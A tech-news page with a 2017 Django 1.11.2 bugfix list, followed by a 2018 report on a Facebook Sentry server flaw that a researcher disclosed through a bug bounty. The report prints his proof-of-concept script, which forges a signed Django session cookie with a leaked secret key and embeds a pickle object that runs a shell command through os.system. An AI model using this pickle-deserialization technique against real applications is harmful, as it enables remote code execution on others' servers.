Django received new update

New version of popular Python framework available now
01 July 2017   845
Django

a high-level, free and open source Python Web framework that encourages rapid and clean development with  pragmatic design.
 

Python

Is a multi-paradigm programming language with easy-to-use syntax and many features.

One of the most popular Python framework received new version. Now Django has 1.11.2 version.

Bugfixes list

  • Added detection for GDAL 2.1 and 2.0, and removed detection for unsupported versions 1.7 and 1.8.
  • Changed contrib.gis to raise ImproperlyConfigured rather than GDALException if gdal isn’t installed, to allow third-party apps to catch that exception.
  • Fixed django.utils.http.is_safe_url() crash on invalid IPv6 URLs.
  • Fixed regression causing pickling of model fields to crash.
  • Fixed django.contrib.auth.authenticate() when multiple authentication backends don’t accept a positional request argument.
  • Fixed introspection of index field ordering on PostgreSQL.
  • Fixed a regression where Model._state.adding wasn’t set correctly on multi-table inheritance parent models after saving a child model.
  • Allowed DjangoJSONEncoder to serialize django.utils.deprecation.CallableBool.
  • Relaxed the validation added in Django 1.11 of the fields in the defaults argument of QuerySet.get_or_create()and update_or_create() to reallow settable model properties.
  • Fixed MultipleObjectMixin.paginate_queryset() crash on Python 2 if the InvalidPage message contains non-ASCII.
  • Prevented Subquery from adding an unnecessary CAST which resulted in invalid SQL.
  • Corrected detection of GDAL 2.1 on Windows.
  • Made date-based generic views return a 404 rather than crash when given an out of range date.
  • Fixed a regression where file_move_safe() crashed when moving files to a CIFS mount.
  • Moved the ImageField file extension validation added in Django 1.11 from the model field to the form field to reallow the use case of storing images without an extension.

Also, new minor feature - new LiveServerTestCase.port attribute reallows the use case of binding to a specific port following the bind to port zero change in Django 1.11. 

Another Facebook Vulnerability to be Found

Cybersecurity specialist from SCRT find a way to execute code on Facebook server remotely
27 August 2018   594

Daniel Le Gall from SCRT, reported about the vulnerability he found in one of the Facebook servers. The problem is in the Sentry web application for logs storage, written in Python using the Django framework. Facebook experts have already patched a security hole in the server.

Daniel found the problem during the scanning of IP addresses of to the social network. On one of them Sentry service was located with host name sentryagreements.thefacebook.com. When reviewing the application, the specialist noticed a stack trace that appears for an unexpected reason, and problems with the user password reset function. According to him, the Django debugging mode was not disabled, so the trace opened the entire environment of the program:

Facebook Vulnerability
Facebook Vulnerability

SCRT expert discovered among the keys of the environment SESSION_SERIALIZER, which was related to the method django.contrib.sessions.serializers.PickleSerializer. Daniel clarified that using a fake session containing arbitrary content of the binary Pickle protocol for serializing objects in Python, you can run any code in the system. To access the session, he needed a secret Django key, which appeared in the list of Sentry settings in plaintext called system.secret-key:

Facebook Vulnerability
Facebook Vulnerability

The researcher wrote a proof-of-concept script that changed the existing contents of sentrysid cookies to an arbitrary object and made the page load for 30 seconds longer:

#!/usr/bin/python
import django.core.signing, django.contrib.sessions.serializers
from django.http import HttpResponse
import cPickle
import os

SECRET_KEY='[RETRIEVEDKEY]'
#Initial cookie I had on sentry when trying to reset a password
cookie='gAJ9cQFYCgAAAHRlc3Rjb29raWVxAlgGAAAAd29ya2VkcQNzLg:1fjsBy:FdZ8oz3sQBnx2TPyncNt0LoyiAw'
newContent =  django.core.signing.loads(cookie,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies')
class PickleRce(object):
    def __reduce__(self):
        return (os.system,("sleep 30",))
newContent['testcookie'] = PickleRce()

print django.core.signing.dumps(newContent,key=SECRET_KEY,serializer=django.contrib.sessions.serializers.PickleSerializer,salt='django.contrib.sessions.backends.signed_cookies',compress=True)

He sent information about the vulnerability to Facebook team and received $ 5000 under the Bug Bounty program. The company specialists cleared the issue in 10 days after receiving the notification.